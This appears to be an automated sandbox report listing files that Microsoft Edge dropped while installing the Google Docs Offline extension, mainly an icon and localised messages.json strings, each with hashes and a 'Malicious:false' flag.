                                                                                                                                                                                                                                                                                          Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\128.png

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):4982
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                          MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                          SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                          SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                          SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\af\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):908
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                          MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                          SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                          SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                          SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\am\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1285
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                          MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                          SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                          SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                          SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\ar\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1244
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                          MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                          SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                          SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                          SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\az\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):977
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                          MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                          SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                          SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                          SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\be\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):3107
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                                          MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                                          SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                                          SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                                          SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\bg\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1389
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                                          MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                                          SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                                          SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                                          SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\bn\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1763
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                                          MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                                          SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                                          SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                                          SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\ca\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):930
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                                          MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                                          SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                                                          SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                                          SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\cs\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):913
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                                                          MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                                                          SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                                                          SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                                                          SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\cy\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):806
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                                          MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                                          SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                                          SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                                          SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\da\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):883
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                                          MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                                          SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                                          SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                                          SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\de\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1031
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                                          MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                                          SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                                          SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                                          SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                                          Malicious:false
